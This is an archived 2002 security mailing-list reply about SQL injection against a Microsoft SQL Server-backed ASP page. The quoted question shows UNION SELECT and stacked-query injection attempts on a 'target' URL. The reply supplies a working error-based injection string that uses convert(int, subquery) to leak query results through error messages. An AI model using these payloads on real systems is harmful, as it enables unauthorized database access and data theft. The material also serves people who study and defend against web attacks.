> Microsoft OLE DB Provider for ODBC Drivers (0x80040E07) > Microsoft][ODBC SQL Server Driver][SQL Server]Operand type clash: ntext is > incompatible with int > > I have tried > > union select username,1,1,.... (20+ columns) from table > union select 1,username,1,1.... > union select 1,1,username,1... Yeah, that can eat up some time. Try using the convert() hack to get the result of your query back in an error message. Assuming that you're dealing with a quoted vulnerability try this injection string: ' %2b convert(int, (SELECT TOP 1 fieldname FROM table WHERE fieldname NOT IN ('knownvalue', 'knownvalue2'))) %2b ' You should get a convert error back that includes the result of the subquery. > I've also tried union select convert(sql_variant,username),1,1,... I think sql_variant only works in the most recent version of SQL Server, so it may not even be a recognized data type > My second problem is that I cannot execute this: http://target/da.asp?userid=user' or 1=1; select * from information_schema.tables-- You're not likely to get the results of a stacked query in your returned page. Stacking queries is mostly useful for executing stored procedures. Good luck. Kevin Spett SPI Dynamics, Inc. ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Sun Mar 17 2002 - 14:51:24 PST